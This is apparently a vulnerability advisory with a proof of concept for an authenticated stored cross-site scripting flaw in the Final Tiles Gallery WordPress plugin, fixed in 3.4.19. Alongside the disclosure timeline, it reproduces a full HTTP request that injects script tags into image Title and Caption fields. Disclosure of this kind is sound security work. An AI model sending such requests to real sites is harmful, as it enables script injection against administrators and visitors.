Final Tiles Gallery < 3.4.19 - Authenticated Stored Cross-Site Scripting (XSS)

Multiple cross-site scripting vulnerabilities in Final Tiles Gallery 3.4.18 and lower allow remote attackers to inject arbitrary web script or HTML via the Title and Caption fields of an image. Successful exploitation of this vulnerability would allow an authenticated high-privileged user (author+) to inject arbitrary javascript code into a post using the gallery which is viewed by admin and other users. Timeline (WPScanTeam): May 14th, 2020 - Issue confirmed, Vendor Contacted (via https://www.machothemes.com/contact-us-now/) and given 14 days for a response before escalating to WP plugins team. May 27th, 2020 - v3.4.19 released, fixing the issue.

PoC

#XSS TRIGGER POINT: When an admin or authenticated user load contents of gallery or post with Shortcode embed: [FinalTilesGallery id=‘3’] https://[WP]/wp-admin/admin.php?page=ftg-lite-gallery-admin&id;=2 https://[WP]/2020/05/13/site-review/ Add an image to a gallery from the plugin, then put the payload in the Title and Caption fields. POST /wp-admin/admin-ajax.php?_fs_blog_admin=true HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://example.com/wp-admin/admin.php?page=ftg-lite-gallery-admin&amp;id;=2 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 368 Origin: http://example.com Connection: close Cookie: wordpress_58dc4566418ddfdf24cf6b5640426bf6=admin%7C1590369568%7CvSHzpmLsv6Kmrqs3GIvTptVPrAKjmhvqSX3Y8xwwaoj%7C3ff5dbb79e29018c7866d9c1a371b372f43c22ff140dfd7b1c0fa68bda3d96ad; table_1=off; table_O-Z=on; table_2=off; table_I-Z=on; table_3=off; table_II-Z=on; table_4=off; table_III-Z=on; table_5=off; table_IV-Z=on; table_6=off; table_V-Z=on; table_7=off; table_VI-Z=on; table_8=off; table_VII-Z=on; table_9=off; table_VIII-Z=on; table_10=off; table_IX-Z=on; table_11=off; table_X-Z=on; table_12=off; table_XI-Z=on; wplcfirstsession=1; wfu_storage_QD1qfXa1PwpRDp11=C:Users; nc_sid=-xLya3FYncyYR9V_llTt; ftg_imglist_size=medium; wp-settings-1=libraryContent%3Dbrowse%26urlbutton%3Dnone%26posts_list_mode%3Dexcerpt%26uploader%3D1%26mfold%3Do; wp-settings-time-1=1589361159; wordpress_logged_in_58dc4566418ddfdf24cf6b5640426bf6=admin%7C1590369568%7CvSHzpmLsv6Kmrqs3GIvTptVPrAKjmhvqSX3Y8xwwaoj%7Cf1c7845d2c3b0856cfa559d0f5496afd2f03e7f519a0f26a3ede63fd8971759c; nc_sid=ta7RSzGrI-rVg-9hyzIk; advanced_ads_hide_deactivate_feedback=1; wplc_chat_status=5; _icl_current_language=en; nc_status=browsing; tcx_customerID=rJQlLlHFcU; wplc_cid=Bk4eLeHFcI_1589362760300; PHPSESSID=909kc73hdpc69l5vk6malipke7 source=images&action;=save_image&FinalTiles;_gallery=3ddb0e3aa2&img;_url=http%3A%2F%2Ftarget%2Fwordpress%2Fwp-content%2Fuploads%2F2020%2F05%2Ftiki-5.jpg&imageTitle;=%3Cscript%3Ealert(1111)%3C%2Fscript%3E&description;=%3Cscript%3Ealert(2222)%3C%2Fscript%3E&alt;=alttext&link;=&target;=&id;=2&type;=image&img;_id=7&sortOrder;=2&filters;=&post;_id=0